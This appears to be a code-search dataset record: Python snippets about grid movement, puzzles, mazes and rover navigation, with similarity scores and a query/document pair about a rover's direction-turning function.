self._grid[zero_row][zero_col + 1] = 0\n zero_col += 1\n elif direction == \"u\":\n assert zero_row > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][\n zero_col]\n self._grid[zero_row - 1][zero_col] = 0\n zero_row -= 1\n elif direction == \"d\":\n assert zero_row < self._height - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][\n zero_col]\n self._grid[zero_row + 1][zero_col] = 0\n zero_row += 1\n else:\n assert False, \"invalid direction: \" + direction", "def move_agent(self, state):\n m = self.m\n n = self.n\n\n cur_env = deepcopy(state.grid)\n cur_env[m, n] = 0\n action = self.choose_action(state)\n\n if action == 'Right':\n if n + 1 >= grid_size or cur_env[m][n+1] != 0:\n Rew = -2 # Reward -5 if we move into wall or another agent\n self.collisions += 1\n else:\n n += 1\n Rew = -0.1 # Reward -1 otherwise\n a = 0 # Action number\n elif action == 'Left':\n if n - 1 < 0 or cur_env[m][n-1] != 0:\n Rew = -2\n self.collisions += 1\n else:\n n -= 1\n Rew = -0.1\n a = 1\n elif action == 'Up':\n if m - 1 < 0 or cur_env[m-1][n] != 0:\n Rew = -2\n self.collisions += 1\n else:\n m -= 1\n Rew = -0.1\n a = 2\n elif action == 'Down':\n if m + 1 >= grid_size or cur_env[m+1][n] != 0:\n Rew = -2\n self.collisions += 1\n else:\n m += 1\n Rew = -0.1\n a = 3\n\n m = m % grid_size\n n = n % grid_size\n self.m = m # Update position of agent\n self.n = n # Update position of agent\n cur_env[m][n] = 1 # Update grid\n new_state = State(cur_env, [m, n]) # Set new state\n terminal = False\n\n if [m, n] == self.end:\n Rew = 10\n terminal = True\n self.carry = True\n\n return new_state, a, Rew, terminal", "def update_puzzle(self, move_string):\n zero_row, zero_col = self.current_position(0, 0)\n for direction in move_string:\n if direction == \"l\":\n assert zero_col > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\n self._grid[zero_row][zero_col - 1] = 0\n zero_col -= 1\n elif direction == \"r\":\n assert zero_col < self._width - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\n self._grid[zero_row][zero_col + 1] = 0\n zero_col += 1\n elif direction == \"u\":\n assert zero_row > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\n self._grid[zero_row - 1][zero_col] = 0\n zero_row -= 1\n elif direction == \"d\":\n assert zero_row < self._height - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\n self._grid[zero_row + 1][zero_col] = 0\n zero_row += 1\n else:\n assert False, \"invalid direction: \" + direction\n for row in self._grid:\n print row\n print", "def _coordinate_after_moving(self, direction, coordinate):\n\n if direction == 'N':\n new_coordinate = Coordinate(coordinate.x, coordinate.y + 1)\n elif direction == 'S':\n new_coordinate = Coordinate(coordinate.x, coordinate.y - 1)\n elif direction == 'W':\n new_coordinate = Coordinate(coordinate.x - 1, coordinate.y)\n else:\n new_coordinate = Coordinate(coordinate.x + 1, coordinate.y)\n\n if not self._is_coordinate_in_the_grid(new_coordinate):\n raise RoverException(ExceptionMessages.OFF_GRID)\n\n if self._is_coordinate_occupied(new_coordinate):\n raise RoverException(ExceptionMessages.ROVER_COLLISION)\n\n return new_coordinate", "def update_puzzle(self, move_string):\n zero_row, zero_col = self.current_position(0, 0)\n for direction in move_string:\n if direction == \"l\":\n assert zero_col > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\n self._grid[zero_row][zero_col - 1] = 0\n zero_col -= 1\n elif direction == \"r\":\n assert zero_col < self._width - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\n self._grid[zero_row][zero_col + 1] = 0\n zero_col += 1\n elif direction == \"u\":\n assert zero_row > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\n self._grid[zero_row - 1][zero_col] = 0\n zero_row -= 1\n elif direction == \"d\":\n assert zero_row < self._height - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\n self._grid[zero_row + 1][zero_col] = 0\n zero_row += 1\n else:\n assert False, \"invalid direction: \" + direction", "def update_puzzle(self, move_string):\n zero_row, zero_col = self.current_position(0, 0)\n for direction in move_string:\n if direction == \"l\":\n assert zero_col > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\n self._grid[zero_row][zero_col - 1] = 0\n zero_col -= 1\n elif direction == \"r\":\n assert zero_col < self._width - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\n self._grid[zero_row][zero_col + 1] = 0\n zero_col += 1\n elif direction == \"u\":\n assert zero_row > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\n self._grid[zero_row - 1][zero_col] = 0\n zero_row -= 1\n elif direction == \"d\":\n assert zero_row < self._height - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\n self._grid[zero_row + 1][zero_col] = 0\n zero_row += 1\n else:\n assert False, \"invalid direction: \" + direction", "def Recharge_Method3(r, c):\n if state.loc[r] != state.pos[c] and state.pos[c] != r:\n if state.pos[c] in rv.LOCATIONS:\n alg.do_task('moveTo', r, state.pos[c])\n else:\n robot = state.pos[c]\n alg.do_command(put, robot, c)\n alg.do_task('moveTo', r, state.pos[c])\n alg.do_command(charge, r, c)\n alg.do_command(take, r, c)", "def move(self, cardinal, maze):\n\n adjacent_room = getattr(self.location, cardinal)\n\n if not adjacent_room:\n out = f\"You cannot go {cardinal} from here.\"\n else:\n adjacent_room.data[\"players\"][self.name] = \\\n self.location.data[\"players\"].pop(self.name)\n\n adjacent_room.players[self.name] = \\\n self.location.players.pop(self.name)\n\n maze[self.location.x][self.location.y] = MazeFactory.room_color\n self.location = adjacent_room\n maze[self.location.x][self.location.y] = MazeFactory.player_color\n\n out = \"You have entered \" + self.location.description\n MazeFactory.update(maze)\n return out", "def test_move(self):\n for row in range(self.game._dim):\n for col in range(self.game._dim):\n self.game.move(row, col, PLAYERX)\n self.assertEqual(self.game.get_square(row, col), PLAYERX)\n\n for row in range(self.game._dim):\n for col in range(self.game._dim):\n self.game.move(row, col, PLAYERO)\n self.assertEqual(self.game.get_square(row, col), PLAYERX)\n self.game._board[row][col] = PLAYERO\n self.game.move(row, col, PLAYERO)\n self.assertEqual(self.game.get_square(row, col), PLAYERO)", "def move(): #py:move\n RUR._move_()", "def move(self, row, col, player):", "def move_to_position1(self):", "def determineNextMove(player_location, opponentLocation, coins):\n global route, currentcoin, meta_route, best_weight, best_path, coins_to_search, index\n if opponentLocation in coins_to_search:\n coins_to_search, meta_route, route = change_way(coins, opponentLocation, player_location)[:3]\n index = 0\n elif currentcoin == player_location: \n if len(route) != 0:\n old_dist = algo.dijkstra(mazeMap, player_location)[1][meta_route[index+1]]\n coins_to_search2, meta_route2, route2, new_dist = change_way(coins, opponentLocation, player_location)\n\n #dist_matrix, route_matrix = u.update_dists_from_each(dists_matrix, routes_matrix, player_location, mazeMap, coins)\n #coins_to_search = get_n_shortest(3, coins, player_location, dists_matrix)\n \t\n #ennemy_dists = algo.dijkstra(mazeMap, opponentLocation)\n #for c in coins_to_search:\n #if len(coins_to_search) >= 2 and ennemy_dists[1][c] < dists_matrix[player_location][c]:\n # coins_to_search.remove(c)\n #break\n \t\t\n #best_weight = float(\"inf\")\n #best_path = []\n #exhaustive(coins_to_search, player_location, [], 0, dist_matrix)\n #meta_route2 = [player_location] + best_path\n #route2 = u.location_list_to_route(meta_route2, route_matrix)\n #new_dist = dist_matrix[player_location][meta_route2[1]]\n\t\t\n if len(route) == 0 or old_dist - new_dist > 3:\n route = route2\n meta_route = meta_route2 \n index = 0\n index += 1\n currentcoin = meta_route[index]\n #api.debug(route)\n return u.direction(player_location, route.pop(0))", "def test_maze_move_6(self):\n maze_template = [['#', '#', '#', '#', '#', '#', '#'], \n ['#', '.', '.', '.', '.', '.', '#'], \n ['#', '.', '#', '#', '#', '.', '#'], \n ['#', '.', '.', '@', '#', '.', '#'], \n ['#', '@', '#', '.', '@', '.', '#'], \n ['#', '#', '#', '#', '#', '#', '#']]\n rat_J = a2.Rat(a2.RAT_1_CHAR, 1, 1)\n rat_P = a2.Rat(a2.RAT_2_CHAR, 1, 4)\n\n maze = a2.Maze(maze_template, rat_J, rat_P)\n old_sprout_count = maze.num_sprouts_left\n\n maze.move(rat_J, a2.DOWN, a2.NO_CHANGE)\n\n self.assertEqual(maze.num_sprouts_left, old_sprout_count)", "def execute_move(move, game, view):\n tokens = move.split()\n\n if len(tokens) > 0:\n command = tokens[0].lower()\n\n if command == \"flag\":\n # Flag commands are expected to be in the format\n # 'flag <column> <row>'\n if len(tokens) == 3:\n try:\n col = int(tokens[1])\n row = int(tokens[2])\n\n game.flag_cell(row, col)\n except ValueError:\n view.invalid_flag_command()\n else:\n view.invalid_flag_command()\n\n elif command == \"uncover\":\n # Uncover commands are expected to be in the format\n # 'uncover <column> <row>'\n if len(tokens) == 3:\n try:\n col = int(tokens[1])\n row = int(tokens[2])\n\n game.uncover_cell(row, col)\n except ValueError:\n view.invalid_uncover_command()\n else:\n view.invalid_uncover_command()\n\n elif command == \"help\":\n view.general_help_message()\n elif command == \"quit\":\n sys.exit()\n else:\n # Unrecognised command\n view.invalid_move()\n else:\n view.invalid_move()", "def solveOneStep(self):\n ### Student code goes here\n # Mark this move as explored\n self.visited[self.currentState] = True\n\n # Get move to make\n movables = self.gm.getMovables()\n # print(\"EXPLORING GAME STATE \" + str(self.gm.getGameState()) + \"---------------------------------------------------------\")\n to_move = self.currentState.nextChildToVisit # movables index\n # print(\"depth \", self.currentState.depth)\n\n # Return if done\n if self.currentState.state == self.victoryCondition:\n # print(\"DONE\")\n return True\n\n while to_move < len(movables):\n # Make the move\n movable_statement = movables[to_move]\n # print(\"implementing move \", movable_statement)\n self.gm.makeMove(movable_statement)\n\n # Create a new state with this move made\n new_state = self.gm.getGameState()\n\n # Find out if this state has already been explored\n visited = False\n for visited_state in self.visited.keys():\n if visited_state.state == new_state:\n visited = True\n\n # If the new state hasn't been visited then add it as a child then move down to this child\n if not visited:\n new_gs = GameState(new_state, self.currentState.depth + 1, movable_statement)\n new_gs.parent = self.currentState\n self.currentState.children.append(new_gs)\n self.currentState.nextChildToVisit = to_move + 1\n self.currentState = new_gs\n break\n\n # Else skip this state and try going to the next movable statement\n else:\n # print(\"SKIP THIS STATE\")\n self.gm.reverseMove(movable_statement)\n to_move += 1\n\n # Went all the way down to a leaf, backtrack\n if (to_move >= len(movables)):\n self.gm.reverseMove(self.currentState.requiredMovable)\n self.currentState = self.currentState.parent\n\n return False", "def solve_2x2(self):\r\n # replace with your code\r\n assert self.row1_invariant(1), '2x2 Dont pass row1_invariant(1)'\r\n whole_move = ''\r\n current_position = self.current_position(0, 0)\r\n # print 'Zero position =', current_position\r\n counter = 0\r\n \r\n\r\n \r\n # if current_position == (0,0):\r\n # print (0,0)\r\n # move_to_00 = 'rdlu' \r\n if current_position == (0,1):\r\n # print (0,1)\r\n move_to_00 = 'l'\r\n if current_position == (1,0):\r\n # print (1,0)\r\n move_to_00 = 'u'\r\n if current_position == (1,1):\r\n # print (1,1)\r\n move_to_00 = 'ul'\r\n whole_move += move_to_00\r\n self.update_puzzle(move_to_00)\r\n # print self\r\n # print self.get_number(1,1) < self.get_number(1,0)\r\n \r\n while self.get_number(0,0) != 0 or self.get_number(0,1) != 1:\r\n \r\n # print 'Aloha in loop!'\r\n counter +=1\r\n move = 'rdlu'\r\n whole_move += move\r\n self.update_puzzle(move)\r\n # print self\r\n if counter >5:\r\n break\r\n return whole_move", "def move_player():\r\n global current_position #say that we want to refer to the one above!\r\n if map1[current_position[0]][current_position[1]] == 'x':\r\n print('we hit a wall!')\r\n current_position = previous_position #hit a wall so we return to the previous position\r\n else:\r\n if map1[current_position[0]][current_position[1]] == 'f': #check have we reach the flag yet\r\n map1[current_position[0]][current_position[1]] = 'p' #set new position to be the player\r\n map1[previous_position[0]][previous_position[1]] = ' ' #set previous position to be empty space\r\n print('we maade it!')\r\n return True\r\n map1[current_position[0]][current_position[1]] = 'p' #move the player to the next position\r\n map1[previous_position[0]][previous_position[1]] = ' '", "def extensions(self):\n def swap(marker, mx, x2, my, y2):\n \"\"\"\n If proper conditions are met, jump over the peg depending on the\n condition\n @param marker: map, list of list\n @param mx: Original x coordinate\n @param x2: Replacement x coordinate\n @param my: Original y coordinate\n @param y2: Replacement y coordinate\n @return: list[list[str]]\n \"\"\"\n # creates a deep copy\n # each if statement checks whether to move the piece N S E W by\n # comparing the current coordinates and the new coordinates\n map = [x[:] for x in marker]\n map[my][mx], map[y2][x2] = map[y2][x2], map[my][mx]\n if my < y2:\n map[my+1][mx] = \".\"\n elif my > y2:\n map[my-1][mx] = \".\"\n elif mx < x2:\n map[my][mx+1] = \".\"\n else:\n map[my][mx-1] = \".\"\n return map\n\n def legal_move(marker, x, y, direction):\n \"\"\"\n Checks if there is a potential move at the direction of\".\"\n coordinate\n @param marker: map of the board\n @param x: x coordinate\n @param y: y coordinate\n @param direction : North South East West of the \".\"\n @return: boolean\n \"\"\"\n # first if statement determines the directions\n # second if statement checks if the \"potential move\" is within the index\n if direction == \"N\":\n if 0 <= y-2 < len(marker):\n return marker[y-2][x] == marker[y-1][x] == '*'\n if direction == \"S\":\n if 0 <= y+2 < len(marker):\n return marker[y+2][x] == marker[y+1][x] == '*'\n if direction == \"W\":\n if 0 <= x-2 < len(marker[0]):\n return marker[y][x-2] == marker[y][x-1] == '*'\n if direction == \"E\":\n if 0 <= x+2 < len(marker[0]):\n return marker[y][x+2] == marker[y][x+1] == '*'\n return False\n\n combos = []\n # For loops go through the coordinates\n # each if statement checks and appends the new scenario\n # iff there is a legal move available\n for y in range(len(self._marker)):\n for x in range(len(self._marker[0])):\n if self._marker[y][x] == '.':\n if legal_move(self._marker, x, y, 'N'):\n combos.append(GridPegSolitairePuzzle(swap(self._marker,\n x, x, y, y-2), self._marker_set))\n if legal_move(self._marker, x, y, 'S'):\n combos.append(GridPegSolitairePuzzle(swap(self._marker,\n x, x, y, y+2), self._marker_set))\n if legal_move(self._marker, x, y, 'W'):\n combos.append(GridPegSolitairePuzzle(swap(self._marker,\n x, x-2, y, y), self._marker_set))\n if legal_move(self._marker, x, y, 'E'):\n combos.append(GridPegSolitairePuzzle(swap(self._marker,\n x, x+2, y, y), self._marker_set))\n return combos", "def move(self, row, column, symbol):\n game_state = self.determine_game_state()\n if game_state not in (GameState.GAME_NOT_STARTED, GameState.GAME_IN_PROGRESS):\n return MoveResults.MOVE_INVALID\n\n # check for initial move\n if self.board == BLANK_BOARD and symbol == O_SYMBOL:\n return MoveResults.MOVE_INVALID\n\n # check for invalid row and column\n if row < 0 or row > 2 or column < 0 or column > 2:\n return MoveResults.MOVE_INVALID\n\n # make sure the game piece is valid\n if symbol != X_SYMBOL and symbol != O_SYMBOL:\n return MoveResults.MOVE_INVALID\n\n # make sure the game piece isn't moving out of turn\n x_moves = self.board.count(X_SYMBOL)\n o_moves = self.board.count(O_SYMBOL)\n if symbol == X_SYMBOL and x_moves > o_moves:\n return MoveResults.MOVE_INVALID\n elif symbol == O_SYMBOL and o_moves >= x_moves:\n # note that x always goes first.\n return MoveResults.MOVE_INVALID \n\n # figure out position.\n position = (3 * row) + column\n\n # make sure there's not already a piece there.\n if self.board[position] != EMPTY_SYMBOL:\n return MoveResults.MOVE_INVALID\n\n self.board = self.board[:position] + symbol + self.board[position+1:] \n return MoveResults.MOVE_VALID", "def move(self, direction):\r\n # replace with your code\r\n row_dir = OFFSETS[direction][0]\r\n col_dir = OFFSETS[direction][1]\r\n \r\n if row_dir == 0:\r\n new_cells = self._cells\r\n new_dir = col_dir\r\n else:\r\n new_tuples = zip(*self._cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n new_dir = row_dir\r\n \r\n tmp_cells = []\r\n for lists in new_cells:\r\n lists = lists[::new_dir]\r\n merge_lists = merge(lists)\r\n tmp_cells.append(merge_lists[::new_dir])\r\n \r\n if row_dir == 0:\r\n self._cells = tmp_cells\r\n else:\r\n new_tuples = zip(*tmp_cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n self._cells = new_cells\r\n \r\n self.new_tile()", "def _walk(self):\n \n newpos= self.rect.move((self.move, 0)) # x方向移動 .move, y方向不動。\n \n # 偵測碰撞左右牆壁,並處理(反彈)\n if not self.area.contains(newpos):\n if self.rect.left < self.area.left or \\\n self.rect.right > self.area.right:\n self.move = -self.move\n newpos = self.rect.move((self.move, 0))\n self.image = pygame.transform.flip(self.image, 1, 0)\n self.rect = newpos", "def solve_interior_tile(self, target_row, target_col):\n \n assert target_row > 1, \"target_row cannot be in rows 0 or 1.\"\n assert self.lower_row_invariant(target_row, target_col), \"tiles to right and below incorrectly ordered\"\n \n correct_tile = self.current_position(target_row, target_col) \n move_str = self.position_tile(target_row, target_col, correct_tile) \n self.update_puzzle(move_str)\n \n assert self.lower_row_invariant(target_row, target_col - 1), \"tiles to right and below incorrectly ordered\"\n \n return move_str", "def moveable(self, board):\n # horizontal\n if self.direction == \"horizontal\":\n # the position to which the car wants to move is either 1 more or 1 less column wise\n right = self.get_cols()[1] + self.size - 1\n left = self.get_cols()[0] - 1\n # check if right or left is out of the boards margins \n if right > board.width_height:\n move_left = board.positions[self.get_rows()[0]][left]\n move_right = None\n elif left < 0:\n move_right = board.positions[self.get_rows()[0]][right]\n move_left = None\n else: \n move_right = board.positions[self.get_rows()[0]][right]\n move_left = board.positions[self.get_rows()[0]][left]\n\n # try to move left and right\n if move_right == \"x\" and move_left == \"x\":\n return \"leftright\"\n elif move_right == \"x\":\n return \"right\"\n elif move_left == \"x\":\n return \"left\"\n else: \n return \"none\"\n \n # vertical\n else:\n up = self.get_rows()[0] - 1\n #print(up)\n down = self.get_rows()[1] + self.size - 1\n # check if up or down is out of the boards margins \n if up < 0:\n # no room on the board for upward movement\n move_down = board.positions[down][self.get_cols()[0]]\n move_up = None\n elif down > board.width_height:\n # no room on the board for downward movement\n move_up = board.positions[up][self.get_cols()[0]]\n move_down = None\n else:\n # both up and down are possible positions on the board\n move_up = board.positions[up][self.get_cols()[0]]\n move_down = board.positions[down][self.get_cols()[0]]\n\n # try to move up and down\n if move_down == \"x\" and move_up == \"x\":\n return \"updown\"\n elif move_up == \"x\":\n return \"up\"\n elif move_down == \"x\":\n return \"down\"\n else: \n return \"none\"", "def makeMove(self, movable_statement):\n ### Student code goes here\n movingTile = movable_statement.terms[0].term.element\n oldColumn = movable_statement.terms[1].term.element\n oldRow = movable_statement.terms[2].term.element\n newColumn = movable_statement.terms[3].term.element\n newRow = movable_statement.terms[4].term.element\n\n empty = parse_input(\"fact: (empty ?x ?y)\")\n emptyFact = self.kb.kb_ask(empty).list_of_bindings[0][1][0]\n\n oldEmptyColumn = emptyFact.statement.terms[0].term.element #should equal newColumn\n oldEmptyRow = emptyFact.statement.terms[1].term.element #should equal newRow\n newEmptyRow = oldRow\n newEmptyColumn = oldColumn\n\n oldOn = parse_input(\"fact: (located \" + movingTile + \" \" + oldColumn + \" \" + oldRow + \")\")\n oldEmpty = parse_input(\"fact: (empty \" + oldEmptyColumn + \" \" + oldEmptyRow + \")\")\n newOn = parse_input(\"fact: (located \" + movingTile + \" \" + newColumn + \" \" + newRow + \")\")\n newEmpty = parse_input(\"fact: (empty \" + newEmptyColumn + \" \" + newEmptyRow + \")\")\n \n self.kb.kb_retract(oldOn)\n self.kb.kb_retract(oldEmpty)\n\n self.kb.kb_assert(newOn)\n self.kb.kb_assert(newEmpty)\n\n #assert all new movable statements\n # for fact in self.kb.facts:\n # if fact.statement.predicate == \"located\":\n # tile = fact.statement.terms[0].term.element\n # column = fact.statement.terms[1].term.element\n # row = fact.statement.terms[2].term.element\n\n # tileNumber = int(tile[-1])\n # columnNumber = int(column[-1])\n # rowNumber = int(row[-1])\n\n # if (columnNumber + 1 == newEmptyColumn) or (columnNumber - 1 == newEmptyColumn):\n # if (rowNumber + 1 == newEmptyRow) or (rowNumber - 1 == newEmptyRow):\n # #tile found is adjacent to empty spot so can move there\n # newMovable = parse_input(\"fact: (movable \" + tile + \" \" + columnNumber + \" \" + rowNumber + \" \" + newEmptyColumn + \" \" + newEmptyRow + \")\")\n # self.kb.kb_assert(newMovable)", "def place_pillar_i(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_i = x, y\r\n if self.pillar_i_room() == self.pillar_a_room() or \\\r\n self.pillar_i_room() == self.pillar_e_room() or \\\r\n self.pillar_i_room() == self.pillar_p_room() or \\\r\n self.pillar_i_room() == self.entrance_room() or \\\r\n self.pillar_i_room() == self.exit_room():\r\n return self.place_pillar_i()\r\n self.__maze[x][y].set_pillar_i(True)" ]
[ "0.6312876", "0.60473263", "0.5894628", "0.5894628", "0.5836864", "0.5819794", "0.581422", "0.5812412", "0.5812412", "0.58097583", "0.58019125", "0.5792342", "0.57617646", "0.5753274", "0.57401913", "0.5738901", "0.5717236", "0.5713577", "0.57098556", "0.57092357", "0.56941414", "0.5677833", "0.5670717", "0.56610096", "0.5658108", "0.56133103", "0.56106454", "0.56064165", "0.5574207", "0.55502754", "0.55494714", "0.55481696", "0.5547895", "0.5546823", "0.5546539", "0.554393", "0.55366975", "0.553581", "0.55332094", "0.55282664", "0.5521815", "0.5509873", "0.55029446", "0.5500003", "0.5490614", "0.5489107", "0.5488251", "0.5473622", "0.54735285", "0.5454175", "0.54478914", "0.5446971", "0.5437355", "0.5437117", "0.5436977", "0.5429957", "0.54284126", "0.542726", "0.54222935", "0.54182047", "0.54115635", "0.5407147", "0.54056495", "0.5402724", "0.54009223", "0.5390307", "0.5390276", "0.53887635", "0.5378361", "0.5375487", "0.5375487", "0.5375487", "0.5375278", "0.5371693", "0.53716207", "0.536728", "0.5362142", "0.53603333", "0.5360332", "0.5360332", "0.53600687", "0.53581893", "0.53549135", "0.53543276", "0.5352836", "0.5351777", "0.5351563", "0.5343986", "0.5343347", "0.5341471", "0.534042", "0.5337914", "0.533162", "0.5331182", "0.53261894", "0.53232336", "0.5317474", "0.5317473", "0.53168535", "0.5316811" ]
0.6905907
0
Basically a state machine Given a instruction('R' or 'L') and a direction('N' or 'S' or 'E' or 'W'), returns the new direction Throws an exception in case of bad instruction
def _direction_after_turning(self, direction, instruction): next_left_states = {'N':'W', 'W': 'S', 'S': 'E', 'E': 'N'} next_right_states = {'N': 'E', 'E': 'S', 'S': 'W', 'W': 'N'} if instruction == 'R': return next_right_states[direction] elif instruction == 'L': return next_left_states[direction] else: raise RoverException(ExceptionMessages.INVALID_INSTRUCTION)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def go_one_step(old_state, direction):\n assert direction in ['R', 'L', 'U', 'D']\n\n x, y = old_state\n if direction == 'R':\n return (x+1, y)\n if direction == 'L':\n return (x-1, y)\n if direction == 'U':\n return (x, y+1)\n if direction == 'D':\n return (x, y-1)", "def getDirection(a):\n try:\n if (int(a) == 0): return \"N\"\n elif (int(a) == 1): return \"S\"\n elif (int(a) == 2): return \"E\"\n elif (int(a) == 3): return \"W\"\n else: raise Exception(\"Invalid Action\")\n except Exception as err:\n print(err)\n exit()", "def _get_direction(self, action, direction):\n left = [2,3,1,0]\n right = [3,2,0,1]\n if direction == 0:\n new_direction = action\n elif direction == -1:\n new_direction = left[action]\n elif direction == 1:\n new_direction = right[action]\n else:\n raise Exception(\"getDir received an unspecified case\")\n return new_direction", "def _get_state(self, state, direction):\n row_change = [-1,1,0,0]\n col_change = [0,0,-1,1]\n row_col = seq_to_col_row(state, self.num_cols)\n row_col[0,0] += row_change[direction]\n row_col[0,1] += col_change[direction]\n\n # check for invalid states\n if self.obs_states is not None:\n if (np.any(row_col < 0) or\n np.any(row_col[:,0] > self.num_rows-1) or\n np.any(row_col[:,1] > self.num_cols-1) or\n np.any(np.sum(abs(self.obs_states - row_col), 1)==0)):\n next_state = state\n else:\n next_state = row_col_to_seq(row_col, self.num_cols)[0]\n else:\n if (np.any(row_col < 0) or\n np.any(row_col[:,0] > self.num_rows-1) or\n np.any(row_col[:,1] > self.num_cols-1)):\n next_state = state\n else:\n next_state = row_col_to_seq(row_col, self.num_cols)[0]\n\n return next_state", "def get_direction(position, next_position):\n x, y = position\n next_x, next_y = next_position\n if x == next_x:\n if y < next_y:\n return constants.Action.Right\n else:\n return constants.Action.Left\n elif y == next_y:\n if x < next_x:\n return constants.Action.Down\n else:\n return constants.Action.Up\n raise constants.InvalidAction(\"We did not receive a valid position transition.\")", "def getDirectionChange(pre, now, next):\r\n return RIGHT", "def navigate_rover(self, name, instruction_str):\n\n rover = self.rovers.get(name)\n if not rover:\n raise RoverException(ExceptionMessages.BAD_NAME)\n\n coordinate = copy.deepcopy(rover.coordinate)\n direction = rover.direction\n\n for instruction in instruction_str:\n\n if instruction == 'L' or instruction == 'R':\n direction = self._direction_after_turning(direction, instruction)\n elif instruction == 'M':\n coordinate = self._coordinate_after_moving(direction, coordinate)\n else:\n raise RoverException(ExceptionMessages.INVALID_INSTRUCTION)\n\n # This means we have processed all the instructions without exception\n # assign new direction and coordinates to rover\n rover.direction = direction\n rover.coordinate = coordinate", "def get_move(self, direction):\n pos = self._state.index(0)\n row = pos // self._size\n col = pos % self._size\n moves = get_moves(self._size, col, row)\n new_state = self._state\n if direction in moves:\n if moves[direction]['is_movable']:\n new_state = move(self._state, pos, moves[direction]['rel_pos'])\n return Node(new_state, heuristic=self._heuristic,\n g_score=self._g_score+self._cost(self._state, new_state))", "def _calculate_move_location(self, direction):\n current_row = self._current_loc.get_row()\n current_column = self._current_loc.get_column()\n\n # Calculate the new location for a left move\n if (direction == \"l\"):\n return Location(current_row, current_column - 1)\n # Calculate the new location for an up move\n elif (direction == \"u\"):\n return Location(current_row - 1, current_column)\n # Calculate the new location for a right move\n elif (direction == \"r\"):\n return Location(current_row, current_column + 1)\n # Calculate the new location for a down move\n elif (direction == \"d\"):\n return Location(current_row + 1, current_column)\n return Location()", "def motorsDirection(self, direction):\n\n print (direction)\n if direction == 'r' or direction == 'R':\n self.motorDirection(self.motor1DirectionPin, self.motorReverse)\n self.motorDirection(self.motor2DirectionPin, self.motorReverse)\n print (\"Direction reverse\")\n else:\n self.motorDirection(self.motor1DirectionPin, self.motorForward)\n self.motorDirection(self.motor2DirectionPin, self.motorForward)\n print (\"Direction forward\")", "def get_action_for_move(\n agent_position: Tuple[int, int],\n agent_direction: Grid4TransitionsEnum,\n next_agent_position: Tuple[int, int],\n next_agent_direction: int,\n rail: GridTransitionMap) -> Optional[RailEnvActions]:\n possible_transitions = rail.get_transitions(*agent_position, agent_direction)\n num_transitions = np.count_nonzero(possible_transitions)\n # Start from the current orientation, and see which transitions are available;\n # organize them as [left, forward, right], relative to the current orientation\n # If only one transition is possible, the forward branch is aligned with it.\n if rail.is_dead_end(agent_position):\n valid_action = RailEnvActions.MOVE_FORWARD\n new_direction = (agent_direction + 2) % 4\n if possible_transitions[new_direction]:\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action\n elif num_transitions == 1:\n valid_action = RailEnvActions.MOVE_FORWARD\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action\n else:\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n if new_direction == agent_direction:\n valid_action = RailEnvActions.MOVE_FORWARD\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action\n elif new_direction == (agent_direction + 1) % 4:\n valid_action = RailEnvActions.MOVE_RIGHT\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action\n elif new_direction == (agent_direction - 1) % 4:\n valid_action = RailEnvActions.MOVE_LEFT\n new_position = get_new_position(agent_position, new_direction)\n if new_position == next_agent_position and new_direction == next_agent_direction:\n return valid_action", "def move(self, direction):\n # Store the values in the connection dictionary in a list\n self.room_num = self.current_room.connection[direction]\n\n # Check if there is a conditional movement and change the current room\n if len(self.room_num) == 1:\n self.current_room = self.rooms[int(self.room_num[0]) - 1]\n else:\n adventure.check(len(self.room_num))", "def new_location (x, y):\n North, South, West, East = walls(x,y)\n while True:\n direction = input('Direction: ').upper()\n\n if direction == 'N' and North:\n y += 1\n break\n elif direction == 'S' and South:\n y -= 1\n break\n elif direction == 'E' and East:\n x += 1\n break\n elif direction == 'W' and West:\n x -=1\n break\n else:\n print('Not a valid direction!')\n return x, y", "def test_input_stream_state_statewp():\n state_t1 = StateTask1(Direction.EAST, 0, 0)\n state_t2 = StateTask2([1, 10], [0, 0])\n\n instructions = tuple(read_instructions(input_stream()))\n assert state_t1.manhatam_distance == 0\n\n assert instructions[0] == Instruction(Direction.FWD, 10)\n state_t1.apply(instructions[0])\n state_t2.apply(instructions[0])\n assert state_t1.north == 0 and state_t1.east == 10\n assert state_t2.waypoint == [1, 10]\n assert state_t2.position == [10, 100]\n\n assert instructions[1] == Instruction(Direction.NORTH, 3)\n state_t1.apply(instructions[1])\n state_t2.apply(instructions[1])\n assert state_t1.north == 3 and state_t1.east == 10\n assert state_t2.waypoint == [4, 10]\n 